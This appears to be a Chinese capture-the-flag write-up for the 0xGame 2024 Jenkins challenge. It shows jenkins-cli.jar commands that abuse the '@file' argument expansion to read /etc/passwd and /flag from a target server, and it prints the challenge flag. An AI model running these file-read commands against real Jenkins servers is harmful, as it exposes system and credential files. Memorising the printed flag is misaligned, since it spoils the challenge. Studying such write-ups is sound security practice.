0xGame 2024 [Week 4] Jenkins

1.前言

由于好久没做web题了,所以今天来尝试来做一波web题,仅供刷题记录。

2.题目

这个给的提示对于小白来说实在是友好的过劲。

3.分析

上网搜到一个关于Jenkins的历史漏洞,下面链接可供参考

https://blog.csdn.net/2301_80127209/article/details/139777834https://blog.csdn.net/2301_80127209/article/details/139777834

打开页面

利用框架漏洞 ,路径后进行添加 /jnlpJars/jenkins-cli.jar,下载下来文件

进行读取文件 ,这里我把下载下来的文件放在了z盘,大家要根据其文件实际位置进行操作

复制代码
java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http who-am-i "@/etc/passwd"

成功实现任意文件读取功能 ,但只是显示了一部分

尝试目标是否开启了"匿名用户可读"选项,开启了话则可以显示全部命令,当然这一步也可省略,但是我们可以测试一波也花不了多长时间

复制代码
java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/etc/passwd"

这时候我们可以尝试读取flag内容了,根据做题经验,猜测flag在根目录下

复制代码
java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/flag"

成功获取到flag

4.答案

复制代码
0xgame{2a6d2b88-7d12-4b66-901d-5ed489e9a322}
相关推荐
我是一颗柠檬9 分钟前
【Java项目技术亮点】加权轮询负载均衡算法
java·算法·负载均衡
灯厂码农14 分钟前
C语言动态内存分配完全指南(malloc、calloc、realloc、free)
java·c语言·算法
四月天431 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
梦梦代码精1 小时前
电商系统不是技术堆叠:LikeShop如何用分层Hold住复杂业务?
java·docker·代码规范
负责的蛋挞1 小时前
异步HttpModule的实现方式
java·服务器·前端
AC赳赳老秦2 小时前
防火墙规则批量配置实战:OpenClaw 自动生成模板、批量下发与合规性校验全解析
java·开发语言·人工智能·python·github·php·openclaw
Tian_Hang2 小时前
Eclipse Ditto 物模型相关代码
java·运维·服务器·ide·eureka·eclipse
Mr-Wanter3 小时前
wsl2 jdk管理工具之sdkman
java·开发语言·sdkman
唐青枫3 小时前
Java Future 与 CompletableFuture 实战指南:从异步结果到任务编排
java
长孙豪翔4 小时前
在.net中读写config文件的各种方法
java·数据库·.net